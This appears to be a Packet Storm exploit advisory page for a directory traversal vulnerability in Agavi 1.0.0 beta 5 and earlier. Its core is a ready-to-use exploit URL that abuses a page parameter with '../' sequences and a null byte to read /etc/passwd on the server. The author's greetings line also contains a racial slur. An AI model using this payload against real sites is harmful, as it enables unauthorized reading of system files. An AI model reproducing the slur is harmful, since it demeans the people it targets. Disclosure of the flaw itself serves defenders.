Agavi versions 1.0.0 Beta 5 and below suffer from a directory traversal vulnerability.
380cb183b88075d1ebb5d2953b49d04eAGAVI <=Agavi 1.0.0 beta 5 Directory Transversal Exploit
vendor : http://www.agavi.org/
affected versions : <=Agavi 1.0.0 beta 5 (latest)
found by t0fx // http://forum.europasecurity.org white hat crew //
exploit :
http://www.site.com/index.php?module=page&action=Display&pageref=[pageref of the site]&cmplang=../../../../../../../../etc/passwd%00.jpg
Greetz to zataz.com // security-sh3ll.com // str0ke // Pig nigger ^^
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!